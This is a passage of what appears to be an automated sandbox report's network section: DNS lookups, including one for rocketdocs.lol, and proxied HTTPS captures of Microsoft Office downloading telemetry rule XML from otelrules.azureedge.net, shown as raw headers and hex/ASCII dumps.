                                                                                                      Oct 8, 2024 20:51:24.388907909 CEST1.1.1.1192.168.2.70x3473No error (0)rocketdocs.lol188.114.97.3A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 20:51:24.388907909 CEST1.1.1.1192.168.2.70x3473No error (0)rocketdocs.lol188.114.96.3A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 20:51:31.301415920 CEST1.1.1.1192.168.2.70x1af5No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 20:51:31.301415920 CEST1.1.1.1192.168.2.70x1af5No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 20:51:47.581161022 CEST1.1.1.1192.168.2.70x8627Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      0192.168.2.74970513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:19 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:19 UTC540INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:19 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 218853
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public
                                                                                                      Last-Modified: Sun, 06 Oct 2024 16:59:23 GMT
                                                                                                      ETag: "0x8DCE6283A3FA58B"
                                                                                                      x-ms-request-id: 86eceaf5-401e-00a3-6fa2-188b09000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185119Z-1657d5bbd48dfrdj7px744zp8s000000051000000000yacg
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:19 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                      2024-10-08 18:51:19 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                      Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                      2024-10-08 18:51:19 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                      Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                      2024-10-08 18:51:19 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                      Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                      2024-10-08 18:51:19 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                      Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                      2024-10-08 18:51:19 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                      Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                      2024-10-08 18:51:19 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                      Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                      2024-10-08 18:51:20 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                      Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                                                      2024-10-08 18:51:20 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                      2024-10-08 18:51:20 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                      Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      1192.168.2.74970913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:20 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:20 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:20 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 3788
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                      x-ms-request-id: 4545068c-701e-0050-0e05-176767000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185120Z-1657d5bbd48vhs7r2p1ky7cs5w00000005sg000000005571
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:20 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      2192.168.2.74970713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:20 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:20 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:20 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 2980
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                      x-ms-request-id: 8aaf7b13-d01e-0028-46fd-167896000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185120Z-1657d5bbd48xlwdx82gahegw4000000005hg00000000pf75
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:20 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      3192.168.2.74971013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:20 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:20 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:20 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 408
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                      x-ms-request-id: 28f6fc08-301e-0020-466a-176299000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185120Z-1657d5bbd48gqrfwecymhhbfm8000000044g00000000t05a
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:20 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      4192.168.2.74970813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:20 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:20 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:20 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 2160
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                      x-ms-request-id: c59bb0f9-701e-0097-2d01-17b8c1000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185120Z-1657d5bbd48xdq5dkwwugdpzr000000005mg00000000ygns
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:20 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      5192.168.2.74970613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:20 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:20 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:20 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 450
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                      x-ms-request-id: 670288bf-701e-003e-1df7-1879b3000000
